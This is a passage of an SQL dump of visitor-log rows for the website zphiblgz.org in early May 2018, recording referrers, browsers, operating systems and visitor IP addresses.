30003,'2018-05-05','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.29','000',1,0),(30004,'2018-05-05','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.30','000',1,0),(30005,'2018-05-05','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.30','000',1,0),(30006,'2018-05-05','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.30','000',1,0),(30007,'2018-05-05','https://zphiblgz.org','Firefox','Linux','21.0','','188.165.233.34','000',2,0),(30008,'2018-05-05','https://www.google.com/','Safari','iPhone','11.0','','173.79.91.144','000',3,0),(30009,'2018-05-05','https://www.google.com/','Safari','iPhone','11.0','','107.77.204.17','000',1,0),(30010,'2018-05-06','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.32','000',1,0),(30011,'2018-05-06','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.32','000',1,0),(30012,'2018-05-06','https://zphiblgz.org/service/','Safari','iPhone','7.0','','40.77.188.8','000',1,0),(30013,'2018-05-06','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',12,0),(30014,'2018-05-06','https://zphiblgz.org','SamsungBrowser','Android','6.4','','99.203.143.118','000',1,0),(30015,'2018-05-06','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','51.255.155.166','000',2,0),(30016,'2018-05-06','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.27','000',1,0),(30017,'2018-05-06','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',2,0),(30018,'2018-05-06','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.165.74','000',2,0),(30019,'2018-05-06','https://store-rx.com/blog/fr/','MSIE','Windows','6.0','','46.118.114.175','000',2,0),(30020,'2018-05-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.196.133.162','000',4,0),(30021,'2018-05-06','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1779.yxXEdtcd6KWdBfVNlJX0al2xA6UyhbOAmrzQOR5WKX8.ddbf52003c96080adfd5ebde65106685a040d269&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041ZFltQXc4VTRxYnVZMVJjdDJOc05QeEdhbVpVWkhrMWJ0bGFjSHoxSUZwQSws&sign=970be87edb885b47ea4c7f76993f8c35&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.81.90','000',2,0),(30022,'2018-05-06','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.150.246','000',1,0),(30023,'2018-05-06','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1779.sm6PAha390hCw1xiv_CLy4qEdJxCP5cKPiexyQYo7Nw.7c5be9624c3d45b2d1d2a679a9e3537785b74ddc&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040SGxvS0EzZjJubmttclZfakRRZC1zUm5Vbkk0TzF4MmpuRlE2aE9qdG1hZyws&sign=77b708cc9516d4cb01a7437682a4bf67&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.65.18.40','000',2,0),(30024,'2018-05-06','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1779.MXP44jKUYbvzrVCUpw-bhS48kMCqyZMw32oHDDC379A.23fbe0c2be679f796ebe37253babe91d1511dab8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042YTdVYTZSN1BqZGd2V2Vrb1k3T2F1SFd1RlYtWjMybkd2Vy10WXIxR1h5USws&sign=703ac1af37a7e4804571039b3768d897&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','89.145.162.191','000',2,0),(30025,'2018-05-06','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1779.s6RvyQDtBgD7vanplw24WyuDGtD4nBVgWhLCQvBQBvY.5a8bbcb46ff395f9e12ca9216df51aff96cf8b0c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041dDAyTmZIbkN2Q1pCOGZqMlI1VHFhbkZTanhfUk81YmxFUzRiZUFsMFJBZyws&sign=d803bd28eb6f5005f928fdf7305d0e05&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','51.255.31.81','000',2,0),(30026,'2018-05-06','https://zphiblgz.org','Firefox','Windows','3.5','','89.38.146.59','000',4,0),(30027,'2018-05-06','https://zphiblgz.org','Chrome','Windows','66.0.3359.139','','105.154.201.186','000',1,0),(30028,'2018-05-06','http://zphiblgz.org/photos/','Chrome','Windows','63.0.3239.84','','146.185.223.202','000',4,0),(30029,'2018-05-06','https://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.24','000',2,0),(30030,'2018-05-06','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.32','000',1,0),(30031,'2018-05-06','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.194.45','000',1,0),(30032,'2018-05-06','https://www.google.com/','Safari','iPhone','11.0','','68.174.3.186','000',3,0),(30033,'2018-05-06','https://zphiblgz.org/scholarship/','AppleWebKit','Windows','534','','65.55.210.192','000',1,0),(30034,'2018-05-06','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','184.154.74.66','000',1,0),(30035,'2018-05-06','https://www.zphiblgz.org:443/','Chrome','Windows','66.0.3359.117','','184.154.74.70','000',1,0),(30036,'2018-05-06','https://www.google.com/','Safari','iPhone','11.0','','107.77.223.217','000',2,0),(30037,'2018-05-06','https://www.google.com/','Chrome','Android','62.0.3202.84','','107.77.204.191','000',6,0),(30038,'2018-05-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.28','000',2,0),(30039,'2018-05-06','https://www.google.com/','Chrome','iPhone','66.0.3359.122','','172.58.184.175','000',5,0),(30040,'2018-05-06','http://www.google.com/','Chrome','Android','65.0.3325.109','','208.54.35.244','000',6,0),(30041,'2018-05-06','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(30042,'2018-05-06','http://zphiblgz.org/','Firefox','Windows','52.0','','146.185.223.111','000',3,0),(30043,'2018-05-06','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',22,0),(30044,'2018-05-06','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(30045,'2018-05-06','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.10','000',1,0),(30046,'2018-05-06','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.17','000',1,0),(30047,'2018-05-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.36.27.7','000',1,0),(30048,'2018-05-06','https://zphiblgz.org','Firefox','Windows','40.1','','105.228.203.245','000',2,0),(30049,'2018-05-06','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.23','000',2,0),(30050,'2018-05-06','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.32','000',1,0),(30051,'2018-05-06','https://www.google.com/','Chrome','Windows','65.0.3325.181','','71.178.5.218','000',3,0),(30052,'2018-05-06','https://zphiblgz.org/scholarship/recommendation/','AppleWebKit','Windows','534','','40.77.189.128','000',2,0),(30053,'2018-05-06','https://www.google.com/','Safari','iPhone','11.0','','73.148.255.48','000',3,0),(30054,'2018-05-06','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.35','000',1,0),(30055,'2018-05-06','https://www.google.com/','Safari','iPhone','11.0','','184.91.26.63','000',2,0),(30056,'2018-05-06','https://www.bing.com/','Edge','Windows','16.16299','','76.20.201.175','000',2,0),(30057,'2018-05-06','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.79','000',1,0),(30058,'2018-05-06','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.31','000',1,0),(30059,'2018-05-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','176.31.180.157','000',1,0),(30060,'2018-05-06','https://www.google.com/','Chrome','Windows','66.0.3359.139','','67.84.15.226','000',5,0),(30061,'2018-05-06','https://www.google.com/','Safari','iPhone','11.0','','71.203.174.54','000',2,0),(30062,'2018-05-06','android-app://com.google.android.googlequicksearchbox','Chrome','Android','66.0.3359.126','','100.16.184.245','000',3,0),(30063,'2018-05-06','https://www.google.com/','Chrome','Macintosh','65.0.3325.181','','149.125.81.62','000',3,0),(30064,'2018-05-06','https://zphiblgz.org','Chrome','Macintosh','33.0.1819.33','','198.46.226.121','000',2,0),(30065,'2018-05-06','https://www.google.com/','Safari','iPhone','11.0','','107.145.7.30','000',2,0),(30066,'2018-05-06','https://www.google.com/','Chrome','Android','64.0.3282.137','','99.203.16.193','000',4,0),(30067,'2018-05-06','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.30','000',1,0),(30068,'2018-05-06','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.5','000',1,0),(30069,'2018-05-06','https://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.174.227','000',1,0),(30070,'2018-05-06','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.31','000',1,0),(30071,'2018-05-06','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(30072,'2018-05-06','https://zphiblgz.org','Chrome','Android','61.0.3116.0','','66.102.6.102','000',2,0),(30073,'2018-05-06','https://zphiblgz.org','Chrome','Android','61.0.3116.0','','66.102.6.106','000',2,0),(30074,'2018-05-06','https://zphiblgz.org','Chrome','Android','61.0.3116.0','','66.102.6.104','000',1,0),(30075,'2018-05-06','https://zphiblgz.org','Chrome','Android','61.0.3116.0','','66.102.6.108','000',1,0),(30076,'2018-05-06','https://zphiblgz.org','MSIE','Windows','11.0','','69.164.111.198','000',2,0),(30077,'2018-05-07','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',11,0),(30078,'2018-05-07','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','46.101.86.21','000',2,0),(30079,'2018-05-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.231.187.61','000',5,0),(30080,'2018-05-07','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',2,0),(30081,'2018-05-07','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','104.131.96.149','000',18,0),(30082,'2018-05-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','104.131.96.149','000',1,0),(30083,'2018-05-07','https://zphiblgz.org','Firefox','Linux','3.6.4','','188.165.233.228','000',47,0),(30084,'2018-05-07','http://m.facebook.com','AppleWebKit','iPhone','605.1.15','','71.227.72.123','000',1,0),(30085,'2018-05-07','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1780.JyUGWT3oh4RzgQBxrh-pw9x2zKuQrHLUqir0CWJa2jQ.3e7eaa323045e0691953a0fbb40d6fd334773b7c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041dkRWSGlYNktjZTBtbkprTnlCazhZYTIxOHlWSm9URmxERmY0ekwyeE9aZyws&sign=48d8eb22b00c4944c6d001fceb5f744f&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','51.255.155.165','000',2,0),(30086,'2018-05-07','https://zphiblgz.org','AppleWebKit','Macintosh','603.3.8','','54.244.71.191','000',2,0),(30087,'2018-05-07','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1780.IdvnnJcxQWw_6tQlbB1z75UzvTRKc3bw_gvoH9DTxQc.7e5926e54967955c84c773d38ee3e5df48cb059f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041QWxpQVk3UXZGcFhxMms4ZEU5NUdQN045bDFOekRXUWRNc0Z1bjI1UHdXUSws&sign=1733b0285b22fad4b613843e4460c81a&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.153.122','000',2,0),(30088,'2018-05-07','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1780.dQmg7bE4cO8dNyQCXahES1WFYx-dYWaUeKsZ9rjYrDM.c58b3a7b81cbd91a2d6d8550afc93d5da96d644a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043b3M1bFJZQkpBeDYzckhuQUpWZlB2ZnlPVm1BalFBRXZTbllnQ29SQ3NhUSws&sign=316e52248531aee1f99dab3cfe46a051&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.52.197.207','000',2,0),(30089,'2018-05-07','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1780.e-OO0PD6fH727aQ5T8kPiX8ryeH844IEsTmzpMSGo0k.038fe955dd7b51d688e215bbabdf55a4937b1128&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043OVN4VXRMWWJFQkdsYzAwRUotUG9hcHpiVTVsM2hkQ3Q1dHpqcHRFMGZJQSws&sign=46f0b03df1b74d29479dd6d992ee3491&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.104.157','000',2,0),(30090,'2018-05-07','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1780.J1P6e2ytekTZdd5dJPbAaJ_4CuBNCrEIWl6dn7TRiGA.c4e37cb3ebe52c277bd5a6d6e86781fa8b8032d4&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042Mnc3eUZQQnRlcTAyM3AtZWhPZHBtWmhhaUFXdEZHNmRtcVRQdU9PT0pldyws&sign=4df393318cdf595534ac854e1faa7c9c&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.33.120','000',2,0),(30091,'2018-05-07','http://zphiblgz.org/','Chrome','Windows','32.0.1700.76','','103.228.117.244','000',1,0),(30092,'2018-05-07','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.217.95.199','000',1,0),(30093,'2018-05-07','https://zphiblgz.org','Opera','Windows','11.10','','31.184.192.185','000',2,0),(30094,'2018-05-07','https://zphiblgz.org','MSIE','Windows','11.0','','148.251.54.44','000',1,0),(30095,'2018-05-07','https://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.157.133','000',1,0),(30096,'2018-05-07','https://zphiblgz.org','Firefox','Windows','7.0.1','','94.16.123.176','000',1,0),(30097,'2018-05-07','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(30098,'2018-05-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(30099,'2018-05-07','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.28','000',1,0),(30100,'2018-05-07','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(30101,'2018-05-07','https://laminat.com.ua/','MSIE','Windows','5.5','','46.118.114.175','000',2,0),(30102,'2018-05-07','https://zphiblgz.org/','Firefox','Windows','40.1','','62.122.95.69','000',2,0),(30103,'2018-05-07','https://zphiblgz.org','Firefox','Windows','7.0.1','','178.32.147.150','000',1,0),(30104,'2018-05-07','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.36.27.6','000',1,0),(30105,'2018-05-07','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.31','000',1,0),(30106,'2018-05-07','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.31','000',1,0),(30107,'2018-05-07','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(30108,'2018-05-07','https://zphiblgz.org/','Edge','Windows','12.10240','','62.122.95.69','000',2,0),(30109,'2018-05-07','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.25','000',1,0),(30110,'2018-05-07','https://zphiblgz.org','Firefox','Windows','7.0.1','','155.4.250.85','000',1,0),(30111,'2018-05-07','https://zphiblgz.org','Chrome','Android','26.0.1410.58','','5.79.83.198','000',14,0),(30112,'2018-05-07','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.28','000',1,0),(30113,'2018-05-07','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(30114,'2018-05-07','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATNG4carQ3NEwtHiszHBlzUhV8ocaWZvO7LsQoQMKKMuGrxnCGhrEzy7lLfiYjigI37FlCSBMTaWsrZIF5WkmVFBBHGZqWkPckjFV57rGAScYt7kKbrzeFn8SLu8ow','Edge','Windows','16.16299','','173.252.124.125','000',2,0),(30115,'2018-05-07','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATNG4carQ3NEwtHiszHBlzUhV8ocaWZvO7LsQoQMKKMuGrxnCGhrEzy7lLfiYjigI37FlCSBMTaWsrZIF5WkmVFBBHGZqWkPckjFV57rGAScYt7kKbrzeFn8SLu8ow','Edge','Windows','16.16299','','173.252.124.122','000',1,0),(30116,'2018-05-07','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.15','000',1,0),(30117,'2018-05-07','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.223','000',1,0),(30118,'2018-05-07','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.78','000',1,0),(30119,'2018-05-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','138.201.60.47','000',2,0),(30120,'2018-05-07','http://zphiblgz.org/','Chrome','Windows','49.0.2623.112','','182.86.208.203','000',1,0),(30121,'2018-05-07','https://zphiblgz.org/','Chrome','Windows','49.0.2623.112','','92.240.132.49','000',2,0),(30122,'2018-05-07','https://zphiblgz.org','Firefox','Windows','7.0.1','','64.113.32.29','000',1,0),(30123,'2018-05-08','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.25.248','000',1,0),(30124,'2018-05-08','https://zphiblgz.org','Firefox','Windows','40.1','','177.42.251.139','000',2,0),(30125,'2018-05-08','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.35','000',1,0),(30126,'2018-05-08','https://zphiblgz.org/','Firefox','Windows','40.0','','62.122.95.69','000',2,0),(30127,'2018-05-08','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',10,0),(30128,'2018-05-08','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.177.20','000',1,0),(30129,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',1,0),(30130,'2018-05-08','https://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.13','000',1,0),(30131,'2018-05-08','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.28','000',1,0),(30132,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.62.57.187','000',1,0),(30133,'2018-05-08','https://zphiblgz.org','Firefox','Windows','40.1','','51.235.78.87','000',2,0),(30134,'2018-05-08','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1781.2WC7nM_9nZjkd0EM8wKLkWLEnY5IvGDJqZZuCM7QUtA.913b5ed2400901305b6002b96d5eb364351bd006&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040a3JLRmg0ZnV4UWRSQlZUNGJEY3JLelJ5cXNwZDhHNmJkNjd6RHk4bGxnZyws&sign=24f5bb8945ff0bd7fc293467cf6c99af&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.6.90','000',2,0),(30135,'2018-05-08','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1781.1-3KbB4MoheMGPPg5TJU-81K3knkmBAYo3U0f9abouw.4fc50237f8be7774f8ab529d7c4977409a0dbe4a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041U1JpOHVnbWIyOXVDVG50N042TDI5bGp3cHhZdzRtSlhVQ0szWV9xZjlmZyws&sign=7c7e83f7369d4a284a02276d9728c0e3&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.187.8','000',2,0),(30136,'2018-05-08','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1781.G1dEKAmK_4FWeFiTCKNHoLX7UhIxIExcYukw14exNqo.55190abb169578ff7b710c87c334dc3a16607d39&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042ZVMtRWhPOG1RSGhJR242bU1fb1pNdGRPRzNfb3pEV2xHam1kcWVuWFpydyws&sign=79b5f97a6818c12c83f6ac045cf3be8e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.185.240','000',2,0),(30137,'2018-05-08','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1781.0Y92351PD-VXAV4a2z2LJerIvIYGqgf3EmVUkPJs_lU.8dccc785ef319c94d3d60b11e1571ebd6d7ac25f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042V09KZ2hrenF4SEoxbC1PTHpwRE5XOWFaLVBON2NFMnRMdnZjM0EwbnJudyws&sign=086c6bb606528c0e484e1de6cf20b084&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','162.243.18.86','000',2,0),(30138,'2018-05-08','https://www.google.com/','Firefox','Windows','59.0','','71.179.27.243','000',4,0),(30139,'2018-05-08','https://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','54.189.129.251','000',2,0),(30140,'2018-05-08','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','52.173.241.248','000',1,0),(30141,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.245.243','000',1,0),(30142,'2018-05-08','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi9i4z2xvbaAhXQY98KHQpaAIUQFggpMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','167.102.242.130','000',10,0),(30143,'2018-05-08','http://www.google.com/','Chrome','Android','66.0.3359.126','','107.77.161.6','000',3,0),(30144,'2018-05-08','http://www.zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','69.12.66.213','000',2,0),(30145,'2018-05-08','https://zphiblgz.org','Chrome','Linux','65.0.3325.181','','138.197.111.57','000',3,0),(30146,'2018-05-08','https://zphiblgz.org','Chrome','Windows','34.0.1847.131','','138.197.111.57','000',2,0),(30147,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.34.228','000',1,0),(30148,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.37.82','000',1,0),(30149,'2018-05-08','https://zphiblgz.org','Chrome','Windows','56.0.2953.23','','178.137.89.106','000',2,0),(30150,'2018-05-08','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(30151,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','89.31.57.5','000',1,0),(30152,'2018-05-08','http://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','163.172.4.153','000',1,0),(30153,'2018-05-08','https://zphiblgz.org/','Chrome','Windows','58.0.3029.96','','163.172.4.153','000',1,0),(30154,'2018-05-08','https://zphiblgz.org','Firefox','Windows','40.1','','78.147.10.70','000',2,0),(30155,'2018-05-08','https://zphiblgz.org','Firefox','Windows','47.0','','146.185.223.221','000',2,0),(30156,'2018-05-08','https://www.google.com/','Safari','iPhone','11.0','','73.2.166.35','000',3,0),(30157,'2018-05-08','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.35','000',1,0),(30158,'2018-05-08','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','195.154.177.103','000',1,0),(30159,'2018-05-08','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.29','000',1,0),(30160,'2018-05-08','https://zphiblgz.org','Firefox','Windows','7.0.1','','216.218.222.14','000',1,0),(30161,'2018-05-08','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',1,0),(30162,'2018-05-08','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(30163,'2018-05-08','https://www.google.com/','Safari','iPhone','11.0','','73.200.96.24','000',2,0),(30164,'2018-05-08','https://zphiblgz.org','MSIE','Windows','11.0','','69.164.111.198','000',2,0),(30165,'2018-05-08','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1782.0L_kUD9C90tk73RJmxe4PS2OOmd6nqjuOFXDr76uyIP8GUBEuH8InUrDDDD-pEpn.a5adc27aec796e7282e6d45a33393e2f62ad4fab&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YD4hgzqAYr5iuWBiLZQy-rY&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV3dLSVBxMzU2VURyVld5OE1NZFJRUWQzR24tMm5SWExvajlXTEEwV3VmaV90bUFheDRBZkhf&b64e=2&sign=09072076b524127e833a370db1cad094&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4s33xItP5xkGOyKpUy96n6LowhscumXr3_qQyxxhPCqfGPUP4k9Uo1DI52F-EBV0gfv6FPbE8UA2C4x6BAUKiNhFVgcHBmlAee8kAD1I0E_4UrqhzCdUJgz0gZI8QYnDa&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCW8ioGO4m6neH9j5hBTQITDlwr2QCjZU40LXyBaPli391fVJiKW81TRJvmImiCrQIrvdzg58XhfIQ&l10n=ru&cts=1525819021051&mc=7.00781127308','MSIE','Windows','10.0','','176.15.19.105','000',1,0),(30166,'2018-05-08','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(30167,'2018-05-08','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(30168,'2018-05-08','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.32','000',1,0),(30169,'2018-05-08','https://zphiblgz.org','Chrome','Windows','49.0.2643.85','','178.137.89.106','000',1,0),(30170,'2018-05-08','https://zphiblgz.org','Chrome','Linux','52.0.2752.44','','146.185.223.25','000',2,0),(30171,'2018-05-08','https://zphiblgz.org','Firefox','Windows','5.0','','208.